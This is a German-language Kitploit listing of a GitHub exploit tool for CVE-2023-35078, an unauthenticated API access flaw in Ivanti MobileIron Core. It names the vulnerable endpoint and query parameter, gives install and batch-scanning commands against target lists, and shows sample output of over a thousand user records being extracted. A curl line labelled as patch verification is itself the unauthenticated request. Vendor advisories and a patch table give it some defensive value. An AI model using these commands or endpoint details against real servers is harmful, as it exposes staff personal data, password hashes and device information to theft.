Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-35078 — CVE-2023-35078 - Ivanti MobileIron Core Exploit-Tool für nicht authentifizierten Remote-API-Zugriff | Kitploit
Tools/GitHubGitHub/0nsec/cve-2023-35078
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - Ivanti MobileIron Core Exploit-Tool für nicht authentifizierten Remote-API-Zugriff

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-35078 Exploit Tool

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Ivanti MobileIron Core Remote Unauthenticated API Access

Python Version License CVSS Last Updated

Ein Python-basierter Proof-of-Concept-Exploit für CVE-2023-35078, der die Remote Unauthenticated API Access-Sicherheitslücke in Ivanti MobileIron Core-Systemen betrifft.

Schwachstellenübersicht

CVE-2023-35078 ist eine kritische Sicherheitslücke, die Ivanti MobileIron Core betrifft und entfernten, nicht authentifizierten Angreifern den Zugriff auf sensible API-Endpunkte und die Extraktion von Benutzerdaten ohne jegliche Authentifizierung ermöglicht.

  • CVSS-Score: 9.8 (Kritisch)
  • CWE: CWE-306 (Fehlende Authentifizierung für kritische Funktion)
  • Betroffene Produkte: Ivanti MobileIron Core
  • Verwundbare Versionen:
    • 11.2 (vor 11.2 CU21)
    • 11.3 (vor 11.3 CU18)
    • 11.4 (vor 11.4 CU8)
  • Angriffsvektor: Netzwerk
  • Authentifizierung: Keine erforderlich
  • Benutzerinteraktion: Keine erforderlich
  • Auswirkung: Vollständige Offenlegung von Benutzerdaten

Technische Details

Die Schwachstelle existiert im API-Authentifizierungsmechanismus von MobileIron Core, insbesondere im Endpunkt /mifs/aad/api/v2/authorized/users. Der Endpunkt validiert Authentifizierungstoken nicht ordnungsgemäß, was unbefugten Zugriff auf sensible Benutzerinformationen ermöglicht, darunter:

  • Benutzerdaten: Benutzernamen, Passwort-Hashes
  • Persönliche Daten: Vollständige Namen, E-Mail-Adressen, Telefonnummern
  • Unternehmensdaten: Mitarbeiter-IDs, Abteilungsinformationen
  • Geräteinformationen: Registrierte Geräte, Gerätekonfigurationen
  • Administrative Daten: Benutzerrollen, Berechtigungen, Gruppenmitgliedschaften

Installation

Voraussetzungen

  • Python: 3.6 oder höher
  • Betriebssystem: Linux, macOS, Windows
  • Netzwerkzugriff: Für Ziel-Tests erforderlich
  • Berechtigungen: Autorisierung von Systembesitzern

Schnellinstallation

root@kitploit:~
# Clone the repository
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# Install dependencies
pip3 install -r requirements.txt

# Make executable (Linux/macOS)
chmod +x cve_2023_35078.py

Manuelle Installation

root@kitploit:~
# Create project directory
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# Download the script
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# Install required packages
pip3 install requests urllib3 termcolor argparse

Docker-Installation (optional)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# Build and run with Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

Verwendung

Grundlegende Verwendung

root@kitploit:~
# Test single target
python3 cve_2023_35078.py -u https://mobileiron.example.com

# Test multiple targets from file
python3 cve_2023_35078.py -f targets.txt

# Verbose mode with custom output directory
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# Custom timeout and output settings
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

Erweiterte Verwendungsbeispiele

root@kitploit:~
# Comprehensive corporate assessment
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# Single target with detailed logging
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# Batch scanning with custom timeout
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# Quick vulnerability check (no verbose output)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

Ausgabe

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] Target: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] Checking version for: https://vulnerable.mobileiron.com
[*] Detected version: 11.3
[+] Target appears VULNERABLE!
[*] Attempting to exploit: https://vulnerable.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] SUCCESS! Found 1,247 users
[+] Results saved to: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] Extracted 1247 user records
[*] Sample fields: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] Scan completed!
[*] Targets processed: 1
[*] Successful exploits: 1
[!] WARNING: 1 vulnerable system(s) found!
[!] Ensure proper authorization before testing!

Ausführliche Ausgabe

root@kitploit:~
[*] Checking version for: https://test.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - Response length: 45,123 bytes
[*] JSON parsing successful
[*] Found user data structure with 234 records
[+] SUCCESS! Found 234 users
[*] Sample user data: {'id': '12345', 'username': '[email protected]'}
[+] Results saved to: ./results/test_mobileiron_com_20250821_055013.json

Leistungsoptimierungen

  • Verbindungspooling: Wiederverwendung von HTTP-Verbindungen
  • Gleichzeitige Anfragen: Parallele Verarbeitung für mehrere Ziele
  • Intelligente Timeouts: Adaptive Auszeit basierend auf Antwortzeiten
  • Speicherverwaltung: Effiziente Handhabung großer Datensätze
  • Ratenbegrenzung: Integrierte Verzögerungen, um Überlastung von Zielen zu vermeiden

Informationen zu Hersteller-Patches

Patch-Überprüfung

root@kitploit:~
# Check current version
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# Verify patched endpoints return 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

Referenzen und Ressourcen

Offizielle Sicherheitshinweise

  • NVD – CVE-2023-35078
  • Ivanti-Sicherheitshinweis
  • CISA Bekannte ausgenutzte Schwachstellen

Technische Dokumentation

  • Ivanti MobileIron Core Admin Guide
  • API-Dokumentation
  • Security Hardening Guide

Forschungsarbeiten und Analysen

  • Detaillierte technische Analyse
  • Ausnutzungstechniken
  • Bedrohungsanalysebericht
Tool herunterladen
VersionVerwundbarPatch verfügbarPatch-LevelVeröffentlichungsdatum
11.2.xJaVerfügbarCU21+2023-07-25
11.3.xJaVerfügbarCU18+2023-07-25
11.4.xJaVerfügbarCU8+2023-07-25
11.5.x+NeinN/VN/VN/V